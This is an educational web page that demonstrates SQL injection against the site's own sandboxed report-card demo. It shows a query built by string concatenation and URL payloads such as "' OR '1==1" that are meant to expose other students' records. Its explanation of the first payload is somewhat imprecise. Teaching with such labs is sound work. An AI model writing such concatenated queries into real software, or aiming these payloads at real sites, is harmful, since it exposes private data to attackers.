SQL Injection

Reset reportcards.db

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.

The URL the web application below loads is:

https://digisoln.com/sqlinject/viewreport?name=Angelina

The name value 'Angelina' injects into the following line of code:

result = db.cursor().execute("SELECT name,code,subject,effort,grade,comment FROM grades WHERE name = '" + name + "'").fetchall()

Where the resulting query (after injection) becomes:

SELECT name,code,subject,effort,grade,comment FROM grades WHERE name = 'Angelina'

Knowing this, we can try an SQL injection to give us both Angelina and Bradleys reports:

https://digisoln.com/sqlinject/viewreport?name=Angelina' OR 'Bradley

Where the resulting query (after injection) now becomes:

SELECT name,code,subject,effort,grade,comment FROM grades WHERE name = 'Angelina' OR 'Bradley'

Taking this a step further, we can try an SQL injection to give us more data we aren't supposed to see:

https://digisoln.com/sqlinject/viewreport?name=' OR '1==1

Given this, the resulting query (after injection) becomes:

SELECT name,code,subject,effort,grade,comment FROM grades WHERE name = '' OR '1==1'

You can try this yourself using the following interface.

The the assigned grades are entirely random. If you need to reset the database, use the reset reportcards.db utility.